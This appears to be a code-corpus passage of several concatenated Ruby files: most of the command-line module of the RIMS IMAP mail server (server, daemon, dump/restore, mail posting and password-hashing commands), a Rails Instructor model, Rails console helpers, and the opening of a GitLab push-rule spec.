replace_undefined_character: replace
}
})
}
end
options.on('--charset-replaced-mark=MARK',
String
) do |mark|
build.chain{|c|
c.load(charset: {
convert_options: {
replaced_mark: mark
}
})
}
end
options.on('--drb-process-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(drb_services: {
process_num: num
})
}
end
options.on('--drb-load-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(drb_services: {
load_limit: size
})
}
end
options.on('--bulk-response-count=COUNT',
Integer) do |count|
build.chain{|c|
c.load(drb_services: {
engine: {
bulk_response_count: count
}
})
}
end
options.on('--bulk-response-size=SIZE',
Integer) do |size|
build.chain{|c|
c.load(drb_services: {
engine: {
bulk_response_size: size
}
})
}
end
options.on('--read-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
read_lock_timeout_seconds: seconds
}
})
}
end
options.on('--write-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
write_lock_timeout_seconds: seconds
}
})
}
end
options.on('--cleanup-write-lock-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(drb_services: {
engine: {
cleanup_write_lock_timeout_seconds: seconds
}
})
}
end
options.on('--meta-kvs-type=TYPE',
"Choose key-value store type of mailbox meta-data database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
type: kvs_type
}
})
}
end
options.on('--meta-kvs-config=JSON_DATA',
JSON,
"Configuration for key-value store of mailbox meta-data database."
) do |json_data|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
configuration: json_data
}
})
}
end
options.on('--[no-]use-meta-kvs-checksum',
"Enable/disable data checksum at key-value store of mailbox meta-data database. default is " +
if (Service::DEFAULT_CONFIG.make_meta_key_value_store_params.middleware_list.include? Checksum_KeyValueStore) then
'enabled'
else
'disbled'
end +
"."
) do |use_checksum|
build.chain{|c|
c.load(storage: {
meta_key_value_store: {
use_checksum: use_checksum
}
})
}
end
options.on('--text-kvs-type=TYPE',
"Choose key-value store type of mailbox text-data database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
type: kvs_type
}
})
}
end
options.on('--text-kvs-config=JSON_DATA',
JSON,
"Configuration for key-value store of mailbox text-data database."
) do |json_data|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
configuration: json_data
}
})
}
end
options.on('--[no-]use-text-kvs-checksum',
"Enable/disable data checksum at key-value store of mailbox text-data database. default is " +
if (Service::DEFAULT_CONFIG.make_text_key_value_store_params.middleware_list.include? Checksum_KeyValueStore) then
'enabled'
else
'disbled'
end +
"."
) do |use_checksum|
build.chain{|c|
c.load(storage: {
text_key_value_store: {
use_checksum: use_checksum
}
})
}
end
options.on('--auth-hostname=HOSTNAME',
String,
"Hostname to authenticate with cram-md5. default is `#{Service::DEFAULT_CONFIG.make_authentication.hostname}'."
) do |hostname|
build.chain{|c|
c.load(authentication: {
hostname: hostname
})
}
end
options.on('--passwd-config=TYPE_JSONDATA',
/([^:]+)(?::(.*))?/,
"Password source type and configuration. format is `[type]:[json_data]'."
) do |_, type, json_data|
build.chain{|c|
c.load(authentication: {
password_sources: [
{ type: type,
configuration: JSON.load(json_data)
}
]
})
}
end
options.on('--passwd-file=TYPE_FILE',
/([^:]+):(.+)/,
"Password source type and configuration file. format is `[type]:[file]'."
) do |_, type, path|
build.chain{|c|
c.load(authentication: {
password_sources: [
{ type: type,
configuration_file: path
}
]
})
}
end
options.on('--mail-delivery-user=USERNAME',
String,
"Username authorized to deliver messages to any mailbox. default is `#{Service::DEFAULT_CONFIG.mail_delivery_user}'"
) do |username|
build.chain{|c|
c.load(authorization: {
mail_delivery_user: username
})
}
end
options.on('--imap-host=HOSTNAME',
String,
'Deplicated.'
) do |host|
warn("warning: `--imap-host=HOSTNAME' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(imap_host: host) }
end
options.on('--imap-port=PORT',
String,
'Deplicated.'
) do |value|
warn("warning: `--imap-port=PORT' is deplicated option and should use `--listen=HOST_PORT'.")
if (value =~ /\A \d+ \z/x) then
port_number = value.to_i
build.chain{|c| c.load(imap_port: port_number) }
else
service_name = value
build.chain{|c| c.load(imap_port: service_name) }
end
end
options.on('--ip-addr=IP_ADDR',
String,
'Deplicated.'
) do |ip_addr|
warn("warning: `--ip-addr=IP_ADDR' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(ip_addr: ip_addr) }
end
options.on('--ip-port=PORT',
Integer,
'Deplicated.'
) do |port|
warn("warning: `--ip-port=PORT' is deplicated option and should use `--listen=HOST_PORT'.")
build.chain{|c| c.load(ip_port: port) }
end
options.on('--kvs-type=TYPE',
'Deplicated.'
) do |kvs_type|
warn("warning: `--kvs-type=TYPE' is deplicated option and should use `--meta-kvs-type=TYPE' or `--text-kvs-type=TYPE'.")
build.chain{|c| c.load(key_value_store_type: kvs_type) }
end
options.on('--[no-]use-kvs-cksum',
'Deplicated.'
) do |use_checksum|
warn("warning: `--[no-]use-kvs-cksum' is deplicated option and should use `--[no-]use-meta-kvs-checksum' or `--[no-]use-text-kvs-checksum'.")
build.chain{|c| c.load(use_key_value_store_checksum: use_checksum) }
end
options.on('-u', '--username=NAME',
String,
'Deplicated.'
) do |name|
warn("warning: `--username=NAME' is deplicated option and should use `--passwd-config=TYPE_JSONDATA' or `--passwd-file=TYPE_FILE'.")
build.chain{|c| c.load(username: name) }
end
options.on('-w', '--password=PASS',
String,
'Deplicated.'
) do |pass|
warn("warning: `--password=PASS' is deplicated option and should use `--passwd-config=TYPE_JSONDATA' or `--passwd-file=TYPE_FILE'.")
build.chain{|c| c.load(password: pass) }
end
build
end
module_function :make_service_config
def cmd_server(options, args)
build = make_service_config(options)
options.parse!(args)
config = build.call
server = Riser::SocketServer.new
service = RIMS::Service.new(config)
service.setup(server)
Signal.trap(:INT) { server.signal_stop_forced }
Signal.trap(:TERM) { server.signal_stop_graceful }
listen_address = Riser::SocketAddress.parse(config.listen_address)
server.start(listen_address.open_server)
0
end
command_function :cmd_server, "Run IMAP server."
def cmd_dump(options, args)
# built-in plug-in
require 'rims/simple_dump'
dump_type = 'simple'
options.on('--dump-type=TYPE', String, 'Choose dump type.') {|value|
dump_type = value
}
opt_verbose = false
options.on('--[no-]verbose') {|value|
opt_verbose = value
}
build = make_service_config(options)
options.parse!(args)
config = build.call
config.require_features
meta_kvs_factory = config.make_meta_key_value_store_params.build_factory
text_kvs_factory = config.make_text_key_value_store_params.build_factory
dump_writer = Dump.get_writer_plug_in(dump_type).new(STDOUT)
Dump.dump_all(dump_writer, config, meta_kvs_factory, text_kvs_factory) {|filename|
if (opt_verbose) then
STDERR.puts filename
end
}
0
end
command_function :cmd_dump, 'Dump mailboxes to standard output.'
def cmd_restore(options, args)
# built-in plug-in
require 'rims/simple_dump'
dump_type = 'simple'
options.on('--dump-type=TYPE', String, 'Choose dump type.') {|value|
dump_type = value
}
opt_dry_run = false
options.on('--[no-]dry-run') {|value|
opt_dry_run = value
}
opt_verbose = false
options.on('--[no-]verbose') {|value|
opt_verbose = value
}
build = make_service_config(options)
options.parse!(args)
config = build.call
config.require_features
meta_kvs_factory = config.make_meta_key_value_store_params.build_factory
text_kvs_factory = config.make_text_key_value_store_params.build_factory
dump_reader = Dump.get_reader_plug_in(dump_type).new(STDIN)
invalid_count = 0
Dump.restore(dump_reader, config, meta_kvs_factory, text_kvs_factory, dry_run: opt_dry_run) {|filename, valid|
unless (valid) then
invalid_count += 1
STDERR.puts "warning: #{filename}: invalid data!"
end
if (opt_verbose) then
puts filename
end
}
if (invalid_count > 0) then
1
else
0
end
end
command_function :cmd_restore, 'Restore mailboxes from standard input.'
def imap_res2str(imap_response)
"#{imap_response.name} #{imap_response.data.text}"
end
module_function :imap_res2str
class Config
def imap_res2str(imap_response)
Cmd.imap_res2str(imap_response)
end
private :imap_res2str
IMAP_AUTH_TYPE_LIST = %w[ login plain cram-md5 ]
MAIL_DATE_PLACE_LIST = [ :servertime, :localtime, :filetime, :mailheader ]
VERBOSE_OPTION_LIST = [
[ :verbose, false, '-v', '--[no-]verbose', "Enable verbose messages. default is no verbose." ]
]
def self.make_imap_connect_option_list(imap_host: 'localhost', imap_port: 143, imap_ssl: false, auth_type: 'login', username: nil)
[ [ :imap_host, imap_host, '-n', '--host=HOSTNAME', "Hostname or IP address to connect IMAP server. default is `#{imap_host}'." ],
[ :imap_port, imap_port, '-o', '--port=PORT', Integer, "Server port number or service name to connect IMAP server. default is #{imap_port}." ],
[ :imap_ssl, imap_ssl, '-s', '--[no-]use-ssl', "Enable SSL/TLS connection. default is #{imap_ssl ? 'enabled' : 'disabled'}." ],
[ :ca_cert, nil, '--ca-cert=PATH', "CA cert file or directory." ],
[ :ssl_params, {}, '--ssl-params=JSON_DATA', JSON, "SSLContext#set_params as parameters." ],
[ :username, username, '-u', '--username=NAME', "Username to login IMAP server. " +
(username ? "default is `#{username}'." : "required parameter to connect server.") ],
[ :password, nil, '-w', '--password=PASS', "Password to login IMAP server. required parameter to connect server." ],
[ :auth_type, auth_type, '--auth-type=METHOD', IMAP_AUTH_TYPE_LIST, "Choose authentication method type (#{IMAP_AUTH_TYPE_LIST.join(' ')}). " +
"default is `#{auth_type}'." ]
]
end
IMAP_CONNECT_OPTION_LIST = make_imap_connect_option_list
POST_MAIL_CONNECT_OPTION_LIST = make_imap_connect_option_list(imap_port: Riser::SocketAddress.parse(Service::DEFAULT_CONFIG.listen_address).port,
username: Service::DEFAULT_CONFIG.mail_delivery_user)
IMAP_MAILBOX_OPTION_LIST = [
[ :mailbox, 'INBOX', '-m', '--mailbox=NAME', String, "Set mailbox name to append messages. default is `INBOX'." ]
]
IMAP_STORE_FLAG_OPTION_LIST = [
[ :store_flag_answered, false, '--[no-]store-flag-answered', "Store answered flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_flagged, false, '--[no-]store-flag-flagged', "Store flagged flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_deleted, false, '--[no-]store-flag-deleted', "Store deleted flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_seen, false, '--[no-]store-flag-seen', "Store seen flag on appending messages to mailbox. default is no flag." ],
[ :store_flag_draft, false, '--[no-]store-flag-draft', "Store draft flag on appending messages to mailbox. default is no flag." ]
]
MAIL_DATE_OPTION_LIST = [
[ :look_for_date, :servertime, '--look-for-date=PLACE', MAIL_DATE_PLACE_LIST,
"Choose the place (#{MAIL_DATE_PLACE_LIST.join(' ')}) to look for the date that as internaldate is appended with message. default is `servertime'."
]
]
def self.symbolize_string_key(collection)
case (collection)
when Hash
Hash[collection.map{|key, value|
[ symbolize_string_key(key),
case (value)
when Hash, Array
symbolize_string_key(value)
else
value
end
]
}]
when Array
collection.map{|value|
case (value)
when Hash, Array
symbolize_string_key(value)
else
value
end
}
else
case (value = collection)
when String
value.to_sym
else
value
end
end
end
def initialize(options, option_list)
@options = options
@option_list = option_list
@conf = {}
for key, value, *_option_description in option_list
@conf[key] = value
end
end
def [](key)
@conf[key]
end
def setup_option_list
@option_list.each do |key, value, *option_description|
@options.on(*option_description) do |v|
@conf[key] = v
end
end
self
end
def help_option(add_banner: nil)
@options.banner += add_banner if add_banner
@options.on('-h', '--help', 'Show this message.') do
puts @options
exit
end
self
end
def quiet_option(default_verbose: true)
@conf[:verbose] = default_verbose
@options.on('-v', '--[no-]verbose', 'Enable verbose messages. default is verbose.') do |verbose|
@conf[:verbose] = verbose
end
@options.on('-q', '--[no-]quiet', 'Disable verbose messages. default is verbose.') do |quiet|
@conf[:verbose] = ! quiet
end
self
end
def load_config_option
@options.on('-f', '--config-yaml=CONFIG_FILE',
String,
"Load optional parameters from CONFIG_FILE.") do |path|
config = YAML.load_file(path)
symbolized_config = self.class.symbolize_string_key(config)
@conf.update(symbolized_config)
end
self
end
def required_feature_option
@options.on('-r', '--required-feature=FEATURE', String, 'Add required feature.') do |feature|
require(feature)
end
@options.on('--load-library=LIBRARY', String, 'Deplicated.') do |library|
warn("warning: `--load-library=LIBRARY' is deplicated option and should use `--required-feature=FEATURE'.")
require(library)
end
self
end
def key_value_store_option
@conf[:key_value_store_type] = GDBM_KeyValueStore
@options.on('--kvs-type=TYPE',
"Choose key-value store type of mailbox database. default is `" +
KeyValueStore::FactoryBuilder.plug_in_names[0] +
"'."
) do |kvs_type|
@conf[:key_value_store_type] = KeyValueStore::FactoryBuilder.get_plug_in(kvs_type)
end
@conf[:use_key_value_store_checksum] = true
@options.on('--[no-]use-kvs-checksum', 'Enable/disable data checksum at key-value store. default is enabled.') do |use_checksum|
@conf[:use_key_value_store_checksum] = use_checksum
end
@options.on('--[no-]use-kvs-cksum', 'Deplicated.') do |use_checksum|
warn("warning: `--[no-]use-kvs-cksum' is deplicated option and should use `--[no-]use-kvs-checksum'.")
@conf[:use_key_value_store_checksum] = use_checksum
end
self
end
def parse_options!(args, order: false)
if (order) then
@options.order!(args)
else
@options.parse!(args)
end
pp @conf if $DEBUG
self
end
def imap_debug_option
@options.on('--[no-]imap-debug',
"Set the debug flag of Net::IMAP class. default is false.") do |v|
Net::IMAP.debug = v
end
self
end
def imap_connect
unless (@conf[:username] && @conf[:password]) then
raise 'need for username and password.'
end
args = [ @conf[:imap_host] ]
if (@conf[:imap_ssl]) then
if (@conf[:ssl_params].empty?) then
args << @conf[:imap_port]
args << @conf[:imap_ssl]
args << @conf[:ca_cert]
else
kw_args = {
port: @conf[:imap_port],
ssl: @conf[:ssl_params]
}
args << kw_args
end
else
args << @conf[:imap_port]
end
imap = Net::IMAP.new(*args)
begin
if (@conf[:verbose]) then
puts "server greeting: #{imap_res2str(imap.greeting)}"
puts "server capability: #{imap.capability.join(' ')}"
end
case (@conf[:auth_type])
when 'login'
res = imap.login(@conf[:username], @conf[:password])
puts "login: #{imap_res2str(res)}" if @conf[:verbose]
when 'plain', 'cram-md5'
res = imap.authenticate(@conf[:auth_type], @conf[:username], @conf[:password])
puts "authenticate: #{imap_res2str(res)}" if @conf[:verbose]
else
raise "unknown authentication type: #{@conf[:auth_type]}"
end
yield(imap)
ensure
imap.logout
end
end
def make_imap_store_flags
store_flags = []
[ [ :store_flag_answered, :Answered ],
[ :store_flag_flagged, :Flagged ],
[ :store_flag_deleted, :Deleted ],
[ :store_flag_seen, :Seen ],
[ :store_flag_draft, :Draft ]
].each do |key, flag|
if (@conf[key]) then
store_flags << flag
end
end
puts "store flags: (#{store_flags.join(' ')})" if @conf[:verbose]
store_flags
end
def look_for_date(message_text, path=nil)
case (@conf[:look_for_date])
when :servertime
nil
when :localtime
Time.now
when :filetime
if (path) then
File.stat(path).mtime
end
when :mailheader
RFC822::Message.new(message_text).date
else
raise "failed to look for date: #{place}"
end
end
def make_kvs_factory
builder = KeyValueStore::FactoryBuilder.new
builder.open{|name| @conf[:key_value_store_type].open_with_conf(name, {}) }
if (@conf[:use_key_value_store_checksum]) then
builder.use(Checksum_KeyValueStore)
end
builder.factory
end
end
def cmd_daemon(options, args)
conf = Config.new(options,
[ [ :use_status_code,
true,
'--[no-]status-code',
"Return the result of `status' operation as an exit code."
],
[ :is_daemon,
nil,
'--[no-]daemon',
'Obsoleted.'
],
[ :is_syslog,
nil,
'--[no-]syslog',
'Obsoleted.'
]
])
conf.help_option(add_banner: ' start/stop/restart/status [server options]')
conf.quiet_option
conf.setup_option_list
conf.parse_options!(args, order: true)
pp args if $DEBUG
operation = args.shift or raise 'need for daemon operation.'
server_options = OptionParser.new
build = make_service_config(server_options)
server_options.parse!(args)
unless (conf[:is_daemon].nil?) then
warn("warning: `--[no-]daemon' is obsoleted option and no effect. use server option `--[no-]daemonize'.")
end
unless (conf[:is_syslog].nil?) then
warn("warning: `--[no-]syslog' is obsoleted option and no effect.")
end
svc_conf = build.call
pp svc_conf if $DEBUG
status_file_locked = lambda{
begin
File.open(svc_conf.status_file, File::WRONLY) {|lock_file|
! lock_file.flock(File::LOCK_EX | File::LOCK_NB)
}
rescue Errno::ENOENT
false
end
}
start_daemon = lambda{
Riser::Daemon.start_daemon(daemonize: svc_conf.daemonize?,
daemon_name: svc_conf.daemon_name,
daemon_debug: svc_conf.daemon_debug?,
daemon_umask: svc_conf.daemon_umask,
status_file: svc_conf.status_file,
listen_address: proc{
# to reload on server restart
build.call.listen_address
},
server_polling_interval_seconds: svc_conf.server_polling_interval_seconds,
server_restart_overlap_seconds: svc_conf.server_restart_overlap_seconds,
server_privileged_user: svc_conf.server_privileged_user,
server_privileged_group: svc_conf.server_privileged_group
) {|server|
c = build.call # to reload on server restart
service = RIMS::Service.new(c)
service.setup(server, daemon: true)
}
}
case (operation)
when 'start'
start_daemon.call
when 'stop'
if (status_file_locked.call) then
pid = YAML.load(IO.read(svc_conf.status_file))['pid']
Process.kill(Riser::Daemon::SIGNAL_STOP_GRACEFUL, pid)
else
abort('No daemon.')
end
when 'restart'
if (status_file_locked.call) then
pid = YAML.load(IO.read(svc_conf.status_file))['pid']
Process.kill(Riser::Daemon::SIGNAL_RESTART_GRACEFUL, pid)
else
start_daemon.call
end
when 'status'
if (status_file_locked.call) then
puts 'daemon is running.' if conf[:verbose]
return 0 if conf[:use_status_code]
else
puts 'daemon is stopped.' if conf[:verbose]
return 1 if conf[:use_status_code]
end
else
raise "unknown daemon operation: #{operation}"
end
0
end
command_function :cmd_daemon, "Daemon start/stop/status tool."
def cmd_environment(options, args)
format = {
yaml: lambda{|env|
YAML.dump(env)
},
json: lambda{|env|
JSON.pretty_generate(env)
}
}
conf = Config.new(options,
[ [ :format_type,
format.keys.first,
'--format=FORMAT',
format.keys,
"Choose display format (#{format.keys.join(' ')})."
]
])
conf.required_feature_option
conf.setup_option_list
conf.parse_options!(args)
env = {
'RIMS Environment' => [
{ 'RUBY VERSION' => RUBY_DESCRIPTION },
{ 'RIMS VERSION' => RIMS::VERSION },
{ 'AUTHENTICATION PLUG-IN' => Authentication.plug_in_names },
{ 'KEY-VALUE STORE PLUG-IN' => KeyValueStore::FactoryBuilder.plug_in_names }
]
}
formatter = format[conf[:format_type]]
puts formatter.call(env)
0
end
command_function :cmd_environment, 'Show rims environment.'
def imap_append(imap, mailbox, message, store_flags: [], date_time: nil, verbose: false)
puts "message date: #{date_time}" if (verbose && date_time)
store_flags = nil if store_flags.empty?
res = imap.append(mailbox, message, store_flags, date_time)
puts "append: #{imap_res2str(res)}" if verbose
nil
end
module_function :imap_append
def each_message(args, verbose: false)
if (args.empty?) then
msg_txt = STDIN.read
yield(msg_txt, nil)
return 0
else
error_count = 0
args.each_with_index do |filename, i|
puts "progress: #{i + 1}/#{args.length}" if verbose
begin
msg_txt = IO.read(filename, mode: 'rb', encoding: 'ascii-8bit')
yield(msg_txt, filename)
rescue
error_count += 1
puts "failed to append message: #{filename}"
Error.trace_error_chain($!) do |exception|
puts "error: #{exception}"
if ($DEBUG) then
for frame in exception.backtrace
puts frame
end
end
end
end
end
if (error_count > 0) then
puts "#{error_count} errors!"
return 1
else
return 0
end
end
end
module_function :each_message
def cmd_post_mail(options, args)
STDIN.set_encoding(Encoding::ASCII_8BIT)
option_list =
Config::VERBOSE_OPTION_LIST +
Config::POST_MAIL_CONNECT_OPTION_LIST +
Config::IMAP_MAILBOX_OPTION_LIST +
Config::IMAP_STORE_FLAG_OPTION_LIST +
Config::MAIL_DATE_OPTION_LIST
conf = Config.new(options, option_list)
conf.help_option(add_banner: ' [POST USER] [MESSAGE_FILEs]')
conf.load_config_option
conf.setup_option_list
conf.imap_debug_option
conf.parse_options!(args)
post_user = args.shift or raise 'need for post user.'
store_flags = conf.make_imap_store_flags
conf.imap_connect{|imap|
unless (imap.capability.find{|c| c == 'X-RIMS-MAIL-DELIVERY-USER' }) then
warn('warning: This IMAP server might not support RIMS mail delivery protocol.')
end
each_message(args) do |msg_txt, filename|
t = conf.look_for_date(msg_txt, filename)
encoded_mbox_name = Protocol::Decoder.encode_delivery_target_mailbox(post_user, conf[:mailbox])
imap_append(imap, encoded_mbox_name, msg_txt, store_flags: store_flags, date_time: t, verbose: conf[:verbose])
end
}
end
command_function :cmd_post_mail, "Post mail to any user."
def cmd_imap_append(options, args)
STDIN.set_encoding(Encoding::ASCII_8BIT)
option_list =
Config::VERBOSE_OPTION_LIST +
Config::IMAP_CONNECT_OPTION_LIST +
Config::IMAP_MAILBOX_OPTION_LIST +
Config::IMAP_STORE_FLAG_OPTION_LIST +
Config::MAIL_DATE_OPTION_LIST
conf = Config.new(options, option_list)
conf.help_option(add_banner: ' [MESSAGE_FILEs]')
conf.load_config_option
conf.setup_option_list
conf.imap_debug_option
conf.parse_options!(args)
store_flags = conf.make_imap_store_flags
conf.imap_connect{|imap|
each_message(args) do |msg_txt, filename|
t = conf.look_for_date(msg_txt, filename)
imap_append(imap, conf[:mailbox], msg_txt, store_flags: store_flags, date_time: t, verbose: conf[:verbose])
end
}
end
command_function :cmd_imap_append, "Append message to IMAP mailbox."
def cmd_mbox_dirty_flag(options, args)
option_list = [
[ :return_flag_exit_code, true, '--[no-]return-flag-exit-code', 'Dirty flag value is returned to exit code. default is true.' ]
]
conf = Config.new(options, option_list)
conf.required_feature_option
conf.key_value_store_option
conf.help_option(add_banner: ' [mailbox directory]')
conf.quiet_option
conf.setup_option_list
write_dirty_flag = nil
options.on('--enable-dirty-flag', 'Enable mailbox dirty flag.') { write_dirty_flag = true }
options.on('--disable-dirty-flag', 'Disable mailbox dirty flag.') { write_dirty_flag = false }
conf.parse_options!(args)
pp conf if $DEBUG
mbox_dir = args.shift or raise 'need for mailbox directory.'
meta_db_path = File.join(mbox_dir, 'meta')
unless (conf[:key_value_store_type].exist? meta_db_path) then
raise "not found a mailbox meta DB: #{meta_db_path}"
end
kvs_factory = conf.make_kvs_factory
meta_db = DB::Meta.new(kvs_factory.call(File.join(mbox_dir, 'meta')))
begin
unless (write_dirty_flag.nil?) then
meta_db.dirty = write_dirty_flag
end
if (conf[:verbose]) then
puts "dirty flag is #{meta_db.dirty?}."
end
if (conf[:return_flag_exit_code]) then
if (meta_db.dirty?) then
1
else
0
end
else
0
end
ensure
meta_db.close
end
end
command_function :cmd_mbox_dirty_flag, 'Show/enable/disable dirty flag of mailbox database.'
def cmd_unique_user_id(options, args)
options.banner += ' [username]'
options.parse!(args)
if (args.length != 1) then
raise 'need for a username.'
end
username = args.shift
puts Authentication.unique_user_id(username)
0
end
command_function :cmd_unique_user_id, 'Show unique user ID from username.'
def cmd_list_user_id(options, args)
svc_conf = RIMS::Service::Configuration.new
load_service_config = false
options.banner += ' [base directory] OR -f [config.yml path]'
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
'Load optional parameters from CONFIG_FILE.') do |path|
svc_conf.load_yaml(path)
load_service_config = true
end
options.parse!(args)
unless (load_service_config) then
base_dir = args.shift or raise 'need for base directory.'
svc_conf.load(base_dir: base_dir)
end
MailStore.scan_unique_user_id(svc_conf) do |unique_user_id|
puts unique_user_id
end
0
end
command_function :cmd_list_user_id, 'List all user ID.'
def cmd_show_user_mbox(options, args)
svc_conf = RIMS::Service::Configuration.new
load_service_config = false
options.banner += ' [base directory] [username] OR -f [config.yml path] [username]'
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
'Load optional parameters from CONFIG_FILE.') do |path|
svc_conf.load_yaml(path)
load_service_config = true
end
options.parse!(args)
unless (load_service_config) then
base_dir = args.shift or raise 'need for base directory.'
svc_conf.load(base_dir: base_dir)
end
username = args.shift or raise 'need for a username.'
unique_user_id = Authentication.unique_user_id(username)
puts svc_conf.make_key_value_store_path(MAILBOX_DATA_STRUCTURE_VERSION, unique_user_id)
0
end
command_function :cmd_show_user_mbox, "Show the path in which user's mailbox data is stored."
def cmd_pass_hash(options, args)
option_list = [
[ :hash_type, 'SHA256', '--hash-type=DIGEST', String, 'Password hash type (ex SHA256, MD5, etc). default is SHA256.' ],
[ :stretch_count, 10000, '--stretch-count=COUNT', Integer, 'Count to stretch password hash. default is 10000.' ],
[ :salt_size, 16, '--salt-size=OCTETS', Integer, 'Size of salt string. default is 16 octets.' ]
]
conf = Config.new(options, option_list)
conf.help_option(add_banner: <<-'EOF'.chomp)
passwd_plain.yml
Example
$ cat passwd_plain.yml
- { user: foo, pass: open_sesame }
- { user: "#postman", pass: "#postman" }
$ rims pass-hash passwd_plain.yml >passwd_hash.yml
$ cat passwd_hash.yml
---
- user: foo
hash: SHA256:10000:YkslZucwN2QJ7LOft59Pgw==:d5dca9109cc787220eba65810e40165079ce3292407e74e8fbd5c6a8a9b12204
- user: "#postman"
hash: SHA256:10000:6Qj/wAYmb7NUGdOy0N35qg==:e967e46b8e0d9df6324e66c7e42da64911a8715e06a123fe5abf7af4ca45a386
Options:
EOF
conf.setup_option_list
conf.parse_options!(args)
pp conf if $DEBUG
case (args.length)
when 0
passwd, *_optional = YAML.load_stream(STDIN)
when 1
passwd, *_optional = File.open(args[0]) {|f| YAML.load_stream(f) }
else
raise ArgumentError, 'too many input files.'
end
digest_factory = Password::HashSource.search_digest_factory(conf[:hash_type])
salt_generator = Password::HashSource.make_salt_generator(conf[:salt_size])
for entry in passwd
pass = entry.delete('pass') or raise "not found a `pass' entry."
entry['hash'] = Password::HashSource.make_entry(digest_factory, conf[:stretch_count], salt_generator.call, pass).to_s
end
puts passwd.to_yaml
0
end
command_function :cmd_pass_hash, 'Make hash password configuration file from plain password configuration file.'
def cmd_debug_dump_kvs(options, args)
option_list = [
[ :match_key, nil, '--match-key=REGEXP', Regexp, 'Show keys matching regular expression.' ],
[ :dump_size, true, '--[no-]dump-size', 'Dump size of value with key.' ],
[ :dump_value, true, '--[no-]dump-value', 'Dump value with key.' ],
[ :marshal_restore, true, '--[no-]marshal-restore', 'Restore serialized object.' ]
]
conf = Config.new(options, option_list)
conf.required_feature_option
conf.key_value_store_option
conf.help_option(add_banner: ' [DB_NAME]')
conf.setup_option_list
conf.parse_options!(args)
pp conf if $DEBUG
name = args.shift or raise 'need for DB name.'
unless (conf[:key_value_store_type].exist? name) then
raise "not found a key-value store: #{name}"
end
factory = conf.make_kvs_factory
db = factory.call(name)
begin
db.each_key do |key|
if (conf[:match_key] && (key !~ conf[:match_key])) then
next
end
entry = key.inspect
if (conf[:dump_size]) then
size = db[key].bytesize
entry += ": #{size} bytes"
end
if (conf[:dump_value]) then
v = db[key]
if (conf[:marshal_restore]) then
begin
v = Marshal.restore(v)
rescue
# not marshal object!
end
end
entry += ": #{v.inspect}"
end
puts entry
end
ensure
db.close
end
0
end
command_function :cmd_debug_dump_kvs, "Dump key-value store contents."
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
| 32.59822 | 166 | 0.517059 |
01121bd7069372ff3602536aeacd5031da73e87d | 816 | # frozen_string_literal: true
class Instructor < ApplicationRecord
has_and_belongs_to_many :positions
validates_presence_of :last_name, :first_name, :utorid
validates_uniqueness_of :utorid
# Returns a formatted string displaying the instructor's contact information
def contact_info
if email?
"#{first_name} #{last_name} <#{email}>"
else
"#{first_name} #{last_name}"
end
end
end
# == Schema Information
#
# Table name: instructors
#
# id :integer not null, primary key
# first_name :string
# last_name :string
# email :string
# utorid :string not null
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_instructors_on_utorid (utorid) UNIQUE
#
| 23.314286 | 80 | 0.645833 |
ac5836a588e0a21c3635a9d2085241562096cd4f | 1,083 | require 'active_support/all'
require 'action_controller'
module Rails
module ConsoleMethods
# reference the global "app" instance, created on demand. To recreate the
# instance, pass a non-false value as the parameter.
def app(create=false)
@app_integration_instance = nil if create
@app_integration_instance ||= new_session do |sess|
sess.host! "www.example.com"
end
end
# create a new session. If a block is given, the new session will be yielded
# to the block before being returned.
def new_session
app = Rails.application
session = ActionDispatch::Integration::Session.new(app)
yield session if block_given?
# This makes app.url_for and app.foo_path available in the console
session.extend(app.routes.url_helpers)
session.extend(app.routes.mounted_helpers)
session
end
# reloads the environment
def reload!(print=true)
puts "Reloading..." if print
ActionDispatch::Reloader.cleanup!
ActionDispatch::Reloader.prepare!
true
end
end
end
| 28.5 | 80 | 0.692521 |
39b68e7e907c3fd026b3435dc202b4b029a6a4ed | 9,108 | require 'spec_helper'
describe PushRule do
using RSpec::Parameterized::TableSyntax
let(:global_push_rule) { create(:push_rule_sample) }
let(:push_rule) { create(:push_rule) }
let(:user) { create(:user) }
let(:project) { Projects::CreateService.new(user, { name: 'test', namespace: user.namespace }).execute }
describe "Associations" do
it { is_expected.to belong_to(:project) }
end
describe "Validation" do
it { is_expected.to validate_presence_of(:project) }
it { is_expected.to validate_numericality_of(:max_file_size).is_greater_than_or_equal_to(0).only_integer }
it 'validates RE2 regex syntax' do
push_rule = build(:push_rule, branch_name_regex: '(ee|ce).*\1')
expect(push_rule).not_to be_valid
expect(push_rule.errors.full_messages.join).to match /invalid escape sequence/
end
end
it 'defaults regexp_uses_re2 to true' do
push_rule = create(:push_rule)
expect(push_rule.regexp_uses_re2).to eq(true)
end
it 'updates regexp_uses_re2 to true on edit' do
push_rule = create(:push_rule, regexp_uses_re2: nil)
expect do
push_rule.update!(branch_name_regex: '.*')
end.to change(push_rule, :regexp_uses_re2).to true
end
describe '#branch_name_allowed?' do
subject(:push_rule) { create(:push_rule, branch_name_regex: '\d+\-.*')}
it 'checks branch against regex' do
expect(subject.branch_name_allowed?('123-feature')).to be true
expect(subject.branch_name_allowed?('feature-123')).to be false
end
it 'uses RE2 regex engine' do
expect_any_instance_of(Gitlab::UntrustedRegexp).to receive(:===)
subject.branch_name_allowed?('123-feature')
end
context 'with legacy regex' do
before do
push_rule.update_column(:regexp_uses_re2, nil)
end
